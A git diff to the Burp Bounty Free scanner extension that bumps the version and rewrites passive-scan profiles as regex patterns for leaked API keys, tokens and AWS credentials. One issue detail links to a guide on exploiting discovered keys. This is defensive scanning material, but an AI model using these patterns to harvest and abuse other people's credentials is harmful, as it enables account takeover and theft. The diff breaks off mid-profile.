diff --git a/BappManifest.bmf b/BappManifest.bmf index 492232b..50e6f34 100644 --- a/BappManifest.bmf +++ b/BappManifest.bmf @@ -2,7 +2,7 @@ Uuid: 618f0b2489564607825e93eeed8b9e0a ExtensionType: 1 Name: Burp Bounty, Scan Check Builder RepoName: scan-check-builder -ScreenVersion: 3.2 +ScreenVersion: 4.0 SerialVersion: 21 MinPlatformVersion: 0 ProOnly: True diff --git a/CHANGELOG.md b/CHANGELOG.md index 16b2f1f..3fb32ad 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,4 +1,9 @@ ## Changelog +**4.0.0 20210902** +* Burp Bounty Pro 1.6 core +* Quick issue alert +* More options for create profiles + **3.6.0 20201005** * Fixed bug with Match And Replace * Fixed bug with content-type detection diff --git a/README.md b/README.md index cc06216..cd755e5 100644 --- a/README.md +++ b/README.md @@ -7,7 +7,7 @@ [![Follow on Twitter](https://img.shields.io/twitter/follow/burpbounty.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=burpbounty) -# Burp Bounty - Scan Check Builder (BApp Store) +# Burp Bounty Free - Scan Check Builder (BApp Store) This Burp Suite extension allows you, in a quick and simple way, to improve the active and passive burpsuite scanner by means of personalized rules through a very intuitive graphical interface. Through an advanced search of patterns and an improvement of the payload to send, we can create our own issue profiles both in the active scanner and in the passive.
diff --git a/profiles/API_Keys.bb b/profiles/API_Keys.bb old mode 100644 new mode 100755 index d411054..4b19abe --- a/profiles/API_Keys.bb +++ b/profiles/API_Keys.bb @@ -1 +1,92 @@ -[{"Name":"API_Keys","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?:\\s|\u003d|:|\"|^)AKC[a-zA-Z0-9]{10,}","true,Or,^(AAAA[A-Za-z0-9_-]{7}:[A-Za-z0-9_-]{140})","true,Or,[^a-zA-Z0-9](AAAA[A-Za-z0-9_-]{7}:[A-Za-z0-9_-]{140})","true,Or,(?i)github(.{0,20})?(?-i)[\u0027\\\"][0-9a-zA-Z]{35,40}","true,Or,^(EAACEdEose0cBA[0-9A-Za-z]+)","true,Or,[^a-zA-Z0-9](EAACEdEose0cBA[0-9A-Za-z]+)","true,Or,(?i)(facebook|fb)(.{0,20})?(?-i)[\u0027\\\"][0-9a-f]{32}","true,Or,[^a-zA-Z0-9](AIza[0-9A-Za-z-_]{35})","true,Or,^(AIza[0-9A-Za-z-_]{35})","true,Or,(?i)(google|gcp|youtube|drive|yt)(.{0,20})?[\u0027\\\"][AIza[0-9a-z\\\\-_]{35}][\u0027\\\"]","true,Or,^([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})","true,Or,[^a-zA-Z0-9]([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})","true,Or,(?i)heroku.{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}","true,Or,(?i)heroku(.{0,20})?[\u0027\"][0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}[\u0027\"]","true,Or,^([0-9a-f]{32}-us[0-9])","true,Or,[^a-zA-Z0-9]([0-9a-f]{32}-us[0-9])","true,Or,^(key-[0-9a-zA-Z]{32})","true,Or,[^a-zA-Z0-9](key-[0-9a-zA-Z]{32})","true,Or,SG\\.[0-9A-Za-z\\-_]{22}\\.[0-9A-Za-z\\-_]{43}","true,Or,(?i)sauce.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f-]{36}(\\\\\\\"|\u0027|`)?","true,Or,xox.-[0-9]{12}-[0-9]{12}-[0-9a-zA-Z]{24}","true,Or,(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})","true,Or,(xox[baprs]-([0-9a-zA-Z]{10,48})?)","true,Or,https:\\/\\/hooks.slack.com\\/services\\/T[a-zA-Z0-9_]{8}\\/B[a-zA-Z0-9_]{8}\\/[a-zA-Z0-9_]{24}","true,Or,sq0[a-z]{3}-[0-9A-Za-z\\-_]{22,43}","true,Or,(?:r|s)k_live_[0-9a-zA-Z]{24}","true,Or,^(SK[0-9a-fA-F]{32})","true,Or,[^a-zA-Z0-9](SK[0-9a-fA-F]{32})","true,Or,^(R_[0-9a-f]{32})","true,Or,[^a-zA-Z0-9](R_[0-9a-f]{32})","true,Or,(?i)nr-internal-api-key","true,Or,(?i)NRAK-[A-Z0-9]{27}","true,Or,(?i)NRRA-[a-f0-9]{42}","true,Or,(?i)NRAA-[a-f0-9]{27}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"API Key or Token discovered","IssueSeverity":"Medium","IssueConfidence":"Firm","IssueDetail":"API Key or Token discovered, check how to take advantage of it here https://github.com/streaak/keyhacks","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "API_Keys", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(?:\\s|\u003d|:|\"|^)AKC[a-zA-Z0-9]{10,}", + "true,Or,^(AAAA[A-Za-z0-9_-]{7}:[A-Za-z0-9_-]{140})", + "true,Or,[^a-zA-Z0-9](AAAA[A-Za-z0-9_-]{7}:[A-Za-z0-9_-]{140})", + "true,Or,(?i)github(.{0,20})?(?-i)[\u0027\\\"][0-9a-zA-Z]{35,40}", + "true,Or,^(EAACEdEose0cBA[0-9A-Za-z]+)", + "true,Or,[^a-zA-Z0-9](EAACEdEose0cBA[0-9A-Za-z]+)", + "true,Or,(?i)(facebook|fb)(.{0,20})?(?-i)[\u0027\\\"][0-9a-f]{32}", + "true,Or,[^a-zA-Z0-9](AIza[0-9A-Za-z-_]{35})", + "true,Or,^(AIza[0-9A-Za-z-_]{35})", + "true,Or,(?i)(google|gcp|youtube|drive|yt)(.{0,20})?[\u0027\\\"][AIza[0-9a-z\\\\-_]{35}][\u0027\\\"]", + "true,Or,^([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})", + "true,Or,[^a-zA-Z0-9]([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})", + "true,Or,(?i)heroku.{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}", + "true,Or,(?i)heroku(.{0,20})?[\u0027\"][0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}[\u0027\"]", + "true,Or,^([0-9a-f]{32}-us[0-9])", + "true,Or,[^a-zA-Z0-9]([0-9a-f]{32}-us[0-9])", + "true,Or,^(key-[0-9a-zA-Z]{32})", + "true,Or,[^a-zA-Z0-9](key-[0-9a-zA-Z]{32})", + "true,Or,SG\\.[0-9A-Za-z\\-_]{22}\\.[0-9A-Za-z\\-_]{43}", + "true,Or,(?i)sauce.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f-]{36}(\\\\\\\"|\u0027|`)?", + "true,Or,xox.-[0-9]{12}-[0-9]{12}-[0-9a-zA-Z]{24}", + "true,Or,(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})", + "true,Or,(xox[baprs]-([0-9a-zA-Z]{10,48})?)", + "true,Or,https:\\/\\/hooks.slack.com\\/services\\/T[a-zA-Z0-9_]{8}\\/B[a-zA-Z0-9_]{8}\\/[a-zA-Z0-9_]{24}", + "true,Or,sq0[a-z]{3}-[0-9A-Za-z\\-_]{22,43}", + "true,Or,(?:r|s)k_live_[0-9a-zA-Z]{24}", + "true,Or,^(SK[0-9a-fA-F]{32})", + "true,Or,[^a-zA-Z0-9](SK[0-9a-fA-F]{32})", + "true,Or,^(R_[0-9a-f]{32})", + "true,Or,[^a-zA-Z0-9](R_[0-9a-f]{32})", + "true,Or,(?i)nr-internal-api-key", + "true,Or,(?i)NRAK-[A-Z0-9]{27}", + "true,Or,(?i)NRRA-[a-f0-9]{42}", + "true,Or,(?i)NRAA-[a-f0-9]{27}" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "API Key or Token discovered", + "IssueSeverity": "Medium", + "IssueConfidence": "Firm", + "IssueDetail": "API Key or Token discovered, check how to take advantage of it here https://github.com/streaak/keyhacks", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/AWS_Access_Key_ID.bb b/profiles/AWS_Access_Key_ID.bb old mode 100644 new mode 100755 index fd76611..b272d40 --- a/profiles/AWS_Access_Key_ID.bb +++ b/profiles/AWS_Access_Key_ID.bb @@ -1 +1,64 @@ -[{"Name":"AWS_Access_Key_ID","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,[^a-zA-Z0-9](AKIA[a-zA-Z0-9]{16})","true,Or,(AccessKeyId|aws_access_key_id)","true,Or,^(AKIA[a-zA-Z0-9]{16})","true,Or,^((A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})","true,Or,[^a-zA-Z0-9]((A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})"],"Tags":["All","Cloud"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"AWS Access Key ID","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "AWS_Access_Key_ID", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,[^a-zA-Z0-9](AKIA[a-zA-Z0-9]{16})", + "true,Or,(AccessKeyId|aws_access_key_id)", + "true,Or,^(AKIA[a-zA-Z0-9]{16})", + "true,Or,^((A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})", + "true,Or,[^a-zA-Z0-9]((A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})" + ], + "Tags": [ + "All", + "Cloud" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "AWS Access Key ID", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/AWS_Client_Secret.bb b/profiles/AWS_Client_Secret.bb old mode 100644 new mode 100755 index 51f5481..5fbe718 --- a/profiles/AWS_Client_Secret.bb +++ b/profiles/AWS_Client_Secret.bb @@ -1 +1,60 @@ -[{"Name":"AWS_Client_Secret","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(SecretAccessKey|aws_secret_access_key)"],"Tags":["All","Cloud"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"AWS Client Secret","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"AWS Client Secret","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "AWS_Client_Secret", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(SecretAccessKey|aws_secret_access_key)" + ], + "Tags": [ + "All", + "Cloud" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "AWS Client Secret", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "AWS Client Secret", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/AWS_Creds_File.bb b/profiles/AWS_Creds_File.bb old mode 100644 new mode 100755 index e578179..59d3e52 --- a/profiles/AWS_Creds_File.bb +++ b/profiles/AWS_Creds_File.bb @@ -1 +1,59 @@ -[{"Name":"AWS_Creds_File","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)(aws_access_key_id|aws_secret_access_key)(.{0,20})?\u003d.[0-9a-zA-Z\\/+]{20,40}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"AWS Credential Files","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "AWS_Creds_File", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(?i)(aws_access_key_id|aws_secret_access_key)(.{0,20})?\u003d.[0-9a-zA-Z\\/+]{20,40}" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "AWS Credential Files", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/AWS_EC2_Url.bb b/profiles/AWS_EC2_Url.bb old mode 100644 new mode 100755 index 38e8f50..7576783 --- a/profiles/AWS_EC2_Url.bb +++ b/profiles/AWS_EC2_Url.bb @@ -1 +1,59 @@ -[{"Name":"AWS_EC2_Url","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,ec2-[0-9-]+.cd-[a-z0-9-]+.compute.amazonaws.com"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"AWS EC2 Url detected","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "AWS_EC2_Url", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,ec2-[0-9-]+.cd-[a-z0-9-]+.compute.amazonaws.com" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "AWS EC2 Url detected", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/AWS_Region.bb b/profiles/AWS_Region.bb old mode 100644 new mode 100755 index e85a934..797be35 --- a/profiles/AWS_Region.bb +++ b/profiles/AWS_Region.bb @@ -1 +1,59 @@ -[{"Name":"AWS_Region","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(us(-gov)?|ap|ca|cn|eu|sa)-(central|(north|south)?(east|west)?)-\\d"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"AWS Region detected","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "AWS_Region", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(us(-gov)?|ap|ca|cn|eu|sa)-(central|(north|south)?(east|west)?)-\\d" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "AWS Region detected", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/AWS_Secret_Key.bb b/profiles/AWS_Secret_Key.bb old mode 100644 new mode 100755 index a73c6e4..fd4b305 --- a/profiles/AWS_Secret_Key.bb +++ b/profiles/AWS_Secret_Key.bb @@ -1 +1,59 @@ -[{"Name":"AWS_Secret_Key","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)aws(.{0,20})?(?-i)[\u0027\\\"][0-9a-zA-Z\\/+]{40}[\u0027\\\"]"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"AWS Secret Key","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "AWS_Secret_Key", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(?i)aws(.{0,20})?(?-i)[\u0027\\\"][0-9a-zA-Z\\/+]{40}[\u0027\\\"]" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "AWS Secret Key", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/AccessToken.bb b/profiles/AccessToken.bb new file mode 100755 index 0000000..afa0963 --- /dev/null +++ b/profiles/AccessToken.bb @@ -0,0 +1,59 @@ +[ + { + "ProfileName": "AccessToken", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,access_token" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "AccessToken", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Access Token Found", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/AmazonAWS.bb b/profiles/AmazonAWS.bb new file mode 100755 index 0000000..4606212 --- /dev/null +++ b/profiles/AmazonAWS.bb @@ -0,0 +1,59 @@ +[ + { + "ProfileName": "AmazonAWS", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,s3..*amazonaws.com" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + 